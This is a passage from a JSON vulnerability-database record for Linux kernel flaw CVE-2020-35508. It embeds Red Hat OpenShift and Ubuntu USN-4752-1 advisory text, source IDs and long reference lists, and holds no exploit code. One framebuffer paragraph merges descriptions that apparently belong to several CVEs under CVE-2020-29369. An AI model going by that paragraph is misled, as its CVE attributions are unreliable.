See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2021:2122\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nThis update fixes the following bug among others:\n\n* Previously, resources for the ClusterOperator were being created early in\nthe update process, which led to update failures when the ClusterOperator\nhad no status condition while Operators were updating. This bug fix changes\nthe timing of when these resources are created. As a result, updates can\ntake place without errors. (BZ#1959238)\n\nSecurity Fix(es):\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-x86_64\n\nThe image digest is\nsha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4\n\n(For s390x architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-s390x\n\nThe image digest is\nsha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le\n\nThe image digest is\nsha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. 
Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor\n\n3. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1923268 - [Assisted-4.7] [Staging] Using two both spelling \"canceled\" \"cancelled\"\n1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go\n1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list\n1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits\n1959238 - CVO creating cloud-controller-manager too early causing upgrade failures\n1960103 - SR-IOV obliviously reboot the node\n1961941 - Local Storage Operator using LocalVolume CR fails to create PV\u0027s when backend storage failure is simulated\n1962302 - packageserver clusteroperator does not set reason or message for Available condition\n1962312 - Deployment considered unhealthy despite being available and at latest generation\n1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone\n1963115 - Test verify /run filesystem contents failing\n\n5. 
==========================================================================\nUbuntu Security Notice USN-4752-1\nFebruary 25, 2021\n\nlinux-oem-5.6 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-oem-5.6: Linux kernel for OEM systems\n\nDetails:\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered\nthat legacy pairing and secure-connections pairing authentication in the\nBluetooth protocol could allow an unauthenticated user to complete\nauthentication without pairing credentials via adjacent access. A\nphysically proximate attacker could use this to impersonate a previously\npaired Bluetooth device. (CVE-2020-10135)\n\nJay Shin discovered that the ext4 file system implementation in the Linux\nkernel did not properly handle directory access with broken indexing,\nleading to an out-of-bounds read vulnerability. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2020-14314)\n\nIt was discovered that the block layer implementation in the Linux kernel\ndid not properly perform reference counting in some situations, leading to\na use-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash). (CVE-2020-15436)\n\nIt was discovered that the serial port driver in the Linux kernel did not\nproperly initialize a pointer in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash). \n(CVE-2020-15437)\n\nAndy Nguyen discovered that the Bluetooth HCI event packet parser in the\nLinux kernel did not properly handle event advertisements of certain sizes,\nleading to a heap-based buffer overflow. 
A physically proximate remote\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2020-24490)\n\nIt was discovered that the NFS client implementation in the Linux kernel\ndid not properly perform bounds checking before copying security labels in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2020-25212)\n\nIt was discovered that the Rados block device (rbd) driver in the Linux\nkernel did not properly perform privilege checks for access to rbd devices\nin some situations. A local attacker could use this to map or unmap rbd\nblock devices. (CVE-2020-25284)\n\nIt was discovered that the block layer subsystem in the Linux kernel did\nnot properly handle zero-length requests. A local attacker could use this\nto cause a denial of service. (CVE-2020-25641)\n\nIt was discovered that the HDLC PPP implementation in the Linux kernel did\nnot properly validate input in some situations. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2020-25643)\n\nKiyin (\u5c39\u4eae) discovered that the perf subsystem in the Linux kernel did\nnot properly deallocate memory in some situations. A privileged attacker\ncould use this to cause a denial of service (kernel memory exhaustion). \n(CVE-2020-25704)\n\nIt was discovered that the KVM hypervisor in the Linux kernel did not\nproperly handle interrupts in certain situations. A local attacker in a\nguest VM could possibly use this to cause a denial of service (host system\ncrash). (CVE-2020-27152)\n\nIt was discovered that the jfs file system implementation in the Linux\nkernel contained an out-of-bounds read vulnerability. A local attacker\ncould use this to possibly cause a denial of service (system crash). 
\n(CVE-2020-27815)\n\nIt was discovered that an information leak existed in the syscall\nimplementation in the Linux kernel on 32 bit systems. A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2020-28588)\n\nIt was discovered that the framebuffer implementation in the Linux kernel\ndid not properly perform range checks in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). A local attacker could use\nthis to gain unintended write access to read-only memory pages. A local attacker could use this to cause a\ndenial of service (system crash) or possibly expose sensitive information. \n(CVE-2020-29369)\n\nJann Horn discovered that the romfs file system in the Linux kernel did not\nproperly validate file system meta-data, leading to an out-of-bounds read. \nAn attacker could use this to construct a malicious romfs image that, when\nmounted, exposed sensitive information (kernel memory). (CVE-2020-29371)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use\nconsistent locking in some situations, leading to a read-after-free\nvulnerability. A local attacker could use this to cause a denial of service\n(system crash) or possibly expose sensitive information (kernel memory). \n(CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux\nkernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after-\nfree vulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. \n(CVE-2020-35508)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n linux-image-5.6.0-1048-oem 5.6.0-1048.52\n linux-image-oem-20.04 5.6.0.1048.44\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. 
\n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://usn.ubuntu.com/4752-1\n CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437,\n CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641,\n CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815,\n CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369,\n CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-35508"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "PACKETSTORM",
"id": "162654"
},
{
"db": "PACKETSTORM",
"id": "162626"
},
{
"db": "PACKETSTORM",
"id": "163584"
},
{
"db": "PACKETSTORM",
"id": "163589"
},
{
"db": "PACKETSTORM",
"id": "162877"
},
{
"db": "PACKETSTORM",
"id": "161556"
},
{
"db": "PACKETSTORM",
"id": "161555"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-35508",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "162626",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "161556",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163584",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021072252",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122404",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0717",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1820",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1866",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2439",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1688",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "161555",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "162654",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-377704",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-35508",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163589",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162877",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "PACKETSTORM",
"id": "162654"
},
{
"db": "PACKETSTORM",
"id": "162626"
},
{
"db": "PACKETSTORM",
"id": "163584"
},
{
"db": "PACKETSTORM",
"id": "163589"
},
{
"db": "PACKETSTORM",
"id": "162877"
},
{
"db": "PACKETSTORM",
"id": "161556"
},
{
"db": "PACKETSTORM",
"id": "161555"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"id": "VAR-202103-0287",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:38:32.343000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Linux\u00a0Kernel\u00a0Archives Red hat Red\u00a0Hat\u00a0Bugzilla",
"trust": 0.8,
"url": "https://github.com/torvalds/linux/commit/b4e00444cab4c3f3fec876dc0cccc8cbb0d1a948"
},
{
"title": "IBM: Security Bulletin: Vulnerabilities in the Linux Kernel, Samba, Sudo, Python, and tcmu-runner affect IBM Spectrum Protect Plus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ddbe78143bb073890c2ecb87b35850bf"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-362",
"trust": 1.1
},
{
"problemtype": "CWE-665",
"trust": 1.1
},
{
"problemtype": "Improper initialization (CWE-665) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35508"
},
{
"trust": 1.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1902724"
},
{
"trust": 1.8,
"url": "https://github.com/torvalds/linux/commit/b4e00444cab4c3f3fec876dc0cccc8cbb0d1a948"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20210513-0006/"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35508"
},
{
"trust": 0.7,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-the-linux-kernel-samba-sudo-python-and-tcmu-runner-affect-ibm-spectrum-protect-plus/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2021:1739"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2021:1578"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2021:2719"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2021:2718"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25704"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072252"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0717"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-privilege-escalation-via-signal-sending-34683"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1866"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1688"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1732"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1820"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2439"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162626/red-hat-security-advisory-2021-1578-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163584/red-hat-security-advisory-2021-2719-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161556/ubuntu-security-notice-usn-4752-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122404"
},
{
"trust": 0.5,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-25704"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-12114"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19528"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-12464"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14314"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25212"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25643"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19523"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-12362"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25284"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0431"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-25285"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12114"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-25212"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19523"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-28974"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14356"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-27835"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-15437"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-25284"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28974"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-27786"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27835"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14314"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-25643"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11608"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11608"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24394"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15437"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-0431"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-0342"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12464"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19528"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24394"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0342"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14356"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25285"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27786"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-18811"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18811"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33909"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-26541"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-006"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33034"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29661"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27815"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28588"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/665.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14347"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8286"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15586"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9951"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36242"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24977"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10878"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-16845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13584"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14360"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21645"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25659"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21643"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9983"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30465"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14345"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14344"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23336"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21644"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14346"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8284"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21642"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4752-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15436"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24490"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25641"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29369"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27152"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29371"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25656"
},
{
"trust": 0.1,
